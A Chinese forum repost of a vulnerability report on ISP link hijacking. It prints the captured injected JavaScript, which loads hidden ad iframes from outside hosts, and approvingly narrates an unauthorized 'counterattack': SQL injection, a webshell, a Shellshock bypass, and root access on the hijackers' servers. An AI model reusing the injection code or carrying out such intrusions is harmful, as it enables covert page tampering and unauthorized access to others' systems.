HanDs
管理员

[7月漏洞公开] 一次对链路劫持的反击 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

起因是几个月前访问乌云和http网站时候网页播放蜜汁声音.当时还是dns劫持比较明显直接改dns就行,最近发现升级成为了链路劫持了,只能拔vpn过日子了.
这次懂得了广域网不用ssl已经不安全了.由衷的希望乌云可以上ssl... 如果分析有错希望大家多多包涵.感谢基友的帮忙..
最后多说一句劫持就算了吧 服务器做这么水 是要送肉鸡给鸡阔吗?
http://www.freebuf.com/vuls/62561.html
http://drops.wooyun.org/tips/11682
http://baike.baidu.com/link?url=_0eYS80EQMjttCrMOTKi6EwzymEAVgStJ9DkEWpHsNevMcPVv2xK4gjaeDzAiq8jfWdLfEaLn6uvqPuHCSD5CK

详细说明:

首先先看看先抓包看看

QQ截图20160711152436.jpg



发现百度统计的**.**.**.**的返回包有问题

**.**.**.**:8080/tt/1.js

/tt/1.js

code 区域
var CUSTOM_LOADJS={support:document.dispatchEvent?"onload":"onreadystatechange",query:{},module:{},add:function(e,t,n){var r=this.module;if(r[e])throw e+" is being";r[e]={},r[e].url=t,r[e].isOkay=n||!1},use:function(e,t){var n={},r;n.namespaces=e.split(","),n.callback=t||function(){},**.**.**.**plet=0,n.total=n.namespaces.length,r=n.namespaces.join(""),this.query[r]=n,this.start(n,r)},start:function(e,t){var n=0,r=e.namespaces.length,i,s;for(n;n<r;n++){s=e.namespaces[n].replace(/^\s+|\s+$/g,""),i=this.module[s];if(i===undefined)throw s+" is undefined";i.isOkay===!1?(i.isOkay=1,this.load(i.url,s,t)):i.isOkay===!0?this.checkBack(s,t):this.wait(i,s,t)}},wait:function(e,t,n){var r=this,i=setInterval(function(){e.isOkay===!0&&(clearInterval(i),r.checkBack(t,n))},500)},checkBack:function(e,t){this.module[e].isOkay=!0;var n=this.query[t];++**.**.**.**plet===n.total&&(n.callback(),delete this.query[t])},load:function(e,t,n){var r=this,i=document.createElement("script");i[this.support]=function(){/undefined|loaded|complete/.test(i.readyState)&&r.checkBack(t,n)},i.setAttribute("type","text/javascript"),i.setAttribute("src",e),document.getElementsByTagName("head")[0].appendChild(i)}}
CUSTOM_LOADJS.add('customadjs', '**.**.**.**:8080/1.js');CUSTOM_LOADJS.use('customadjs', function(){});



1.js

code 区域
~function(){
try{
if(window.location.href.indexOf('**.**.**.**') == -1 && window.location.href.indexOf('**.**.**.**') == -1){
load_page('http://**.**.**.**/js/bbk365_ad_ext.html');
load_page('http://**.**.**.**/ad/ggj_51yrj.html');
load_page('http://**.**.**.**/ad/ggj_kea1688.html');
load_page('http://**.**.**.**/js/bbk365_ad.html');
}
}catch(ee){}
}();
function load_page(url){
try {
var x_ifr = '<div>'
+ ' <iframe style="display:none" src="'+url+'"></iframe>'
+ '</div>';
var x = document.createElement('div');
x.style.cssText="display:none;";
x.innerHTML=x_ifr;
document.body.appendChild(x);
} catch (e) {

}
}



1.js里面的

code 区域
function load_page(url){
try {
var x_ifr = '<div>'
+ ' <iframe style="display:none" src="'+url+'"></iframe>'
+ '</div>';
var x = document.createElement('div');
x.style.cssText="display:none;";
x.innerHTML=x_ifr;
document.body.appendChild(x);
} catch (e) {

}
}



QQ截图20160711153032.jpg



http://**.**.**.**/js/bbk365_ad_ext.html

http://**.**.**.**/ad/ggj_51yrj.html

http://**.**.**.**/ad/ggj_kea1688.html

http://**.**.**.**/js/bbk365_ad.html

先查查域名信息吧,发现大多数都有域名信息保护

QQ截图20160711153634.jpg



然后叫机油用大数据找了一下发现这个邮箱是目标的常用邮箱之一于是找到了QQ

QQ截图20160711153821.jpg



QQ截图20160711153927.jpg



然后用Wireshark 确定一下是哪一跳出问题了.

可以看到有两个相同的包有一个被抛弃了

QQ截图20160711154404.jpg



QQ截图20160711155016.jpg



不可能在同一个地方跳两次呀有点可疑啊.

假设乌云的ttl值为64

QQ截图20160711155227.jpg



经过了9个路由应该是55呀 但是他是52 可以推测是第2-4附近的问题

可以得出**.**.**.**就是被劫持的路由器

然后对js调用的网站进行了渗透

http://**.**.**.**/存在一处注入

得到了数据库的root密码和ftp的密码

QQ截图20160711160156.jpg



然后发现是用lnmp搭建的悲催的是发现mysql被降权了,但是是站库分离 说不定数据库开放了ftp

于是对c段进行了扫描

QQ截图20160711160631.jpg



过程就是上传了一句话发现Disable_functions了然后用CVE-2014-6271 破壳漏洞搞定最后提权到root

QQ截图20160711161045.jpg



然后在数据库中找到了各种cms的密码进行getshell

QQ截图20160711161655.jpg



QQ截图20160711161709.jpg



QQ截图20160711161739.jpg



还有各种广告推广什么的 毕竟不懂他们盈利的方式

访问量

QQ截图20160711161045.jpg



大致准确吧

QQ截图20160711162232.jpg



QQ截图20160711162355.jpg



QQ截图20160711162650.jpg

漏洞证明:

劫持的链接有这么一个域名

QQ截图20160711163257.jpg



QQ截图20160711163350.jpg



发现这个规模不大的公司在做这个 毕竟我不是运营商圈内人士,加上重庆联通这边宽带是外包的就比较复杂 到底是哪个环节出了问题还请jc叔叔们去找了.这样劫持如果被其他黑阔搞下找个0day挂几天分分钟感染一大堆啊...

修复方案:

劫持就算了吧 服务器做这么水 是要送肉鸡给鸡阔吗?


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
一次 链路 劫持 反击
#1楼
发帖时间:2016-7-18   |   查看数:0   |   回复数:0
游客组
快速回复